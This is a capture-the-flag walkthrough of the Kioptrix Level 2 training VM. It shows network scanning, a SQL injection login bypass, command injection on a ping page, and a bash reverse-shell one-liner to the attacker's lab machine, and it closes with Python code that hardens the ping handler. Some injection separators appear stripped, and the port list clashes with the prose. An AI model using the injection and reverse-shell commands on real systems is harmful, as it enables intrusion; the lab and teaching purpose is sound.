Kioptrix: Level 1.1 (Level 2) is the second VM of the Kioptrix series, which can be found here.

The Kioptrix VMs are intended for anyone who wants to start getting into pentesting or wants to pursue the OSCP exam. Start your Kioptrix 1.1 (Level 2) VM machine and you will get a screen similar to the one below, which prompts for some kind of login. Your task is to get into a root shell and access all the files.

So your first step is to get the IP address of this machine, which you can easily do with the netdiscover tool by typing the following command in your terminal.

Command: netdiscover -i eth0 -r 192.168.36.0/24

Note: Make sure that your Kali Linux machine and the Kioptrix VM machine are on the same NAT network.

So your Kioptrix VM machine IP is 192.168.36.130 and your Kali Linux machine IP is 192.168.36.128. Let's go ahead and fingerprint all the ports and services with the help of the Nmap tool.

As you can see, the following ports are in the open state:

- Port 80/tcp – HTTP – Apache httpd 2.0.52
- Port 443/tcp – HTTPS – Apache httpd 2.0.52

From the initial scanning, it seems that an SSH service is running on port 22, and an Apache service is also running on port 80 and port 443, which is interesting for all of us. Even more, on port 3306 a MySQL service is also running, which means there should be some kind of DB connectivity, so the chances of SQL Injection are very HIGH. On port 631, the CUPS service (Common Unix Printing System) is running, version 1.1. A quick Google search showed us that CUPS had multiple vulnerabilities.

Let's also try pulling up the port 80/443 site in a browser, which shows some kind of login page. So whenever you find a login page, your first step is to try to bypass it with SQL Injection (string based). You can try to bypass it with the following payload:

If you want to learn more about SQL Injection, then I suggest you read this article by Chetan Soni.

Perfect! The SQL Injection worked and we are able to access the next page, which seems like a Ping Command prompt! We can test this Ping Command prompt by trying to ping our Kali Linux machine (192.168.36.128).

Okay! It seems that the ping command works and that the PHP code is executing system commands. At this point, we can try to see if the PHP script is vulnerable to Command Injection. Back at the main Ping Command page, let's go ahead and type:

192.168.36.128 ls id whoami

What this does is basically tell the system to run ping against our Kali Linux machine, then run the ls command, the id command and the whoami command. Technically the “ ” symbol is a command separator.

Nice! The script is vulnerable to command injection! Thus, we can go ahead and attempt to invoke a reverse shell. Let's start by setting up a Netcat listener on port 1337 by typing the following command in your Kali Linux machine terminal.

Now, let's go back to the Ping console on the website and run the following command:

Command: 127.0.0.1 bash -i >& /dev/tcp/192.168.36.128/1337 0>&1

This will basically initiate a reverse TCP connection using bash to the IP address of your machine (192.168.36.128 in our case), on port 1337.

Perfect! We were able to connect to the victim's machine, and it seems that we are currently running as the normal user account. Our next step from here would be to carry out some privilege escalation to be able to get access to the root account.
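The root cause of the ping page's command injection in this walkthrough is that user input is pasted into a shell command string. As an added example (not the Kioptrix application's code, which is PHP and not shown on this page), the hypothetical Python handler below shows the two fixes a defender would apply: the target must parse as a bare IP address, and ping is invoked as an argv list with no shell, so separator characters are never interpreted. The sample inputs are constructed for illustration.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# Shell metacharacters worth flagging in a web log or WAF rule (detection aid,
# not the security boundary; the boundary is the allow-list validation below).
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")


def validate_target(user_input: str) -> Optional[str]:
    """Return the canonical IP string if the input is a bare IPv4/IPv6 address, else None."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        return None


def looks_like_injection(user_input: str) -> bool:
    """True when the input carries characters a shell would treat as separators/substitution."""
    return SHELL_META.search(user_input) is not None


def build_ping_argv(user_input: str) -> Optional[List[str]]:
    """Build the argv for a single ping, or None if the target is rejected."""
    target = validate_target(user_input)
    if target is None:
        return None
    # A validated IP cannot start with '-', so it cannot be mistaken for a ping option.
    return ["ping", "-c", "3", target]


def run_ping(user_input: str) -> dict:
    """Hardened handler: reject bad input, otherwise run ping without a shell."""
    argv = build_ping_argv(user_input)
    if argv is None:
        # Log-worthy event: the rejected input can be correlated with the source IP.
        return {"status": "rejected", "suspicious": looks_like_injection(user_input)}
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=15)
    return {"status": "ok", "returncode": proc.returncode, "output": proc.stdout}


if __name__ == "__main__":
    # Constructed inputs: a legitimate target and an injection-style string.
    for sample in ("192.168.36.128", "192.168.36.128; ls; id; whoami"):
        print(sample, "->", build_ping_argv(sample), looks_like_injection(sample))
```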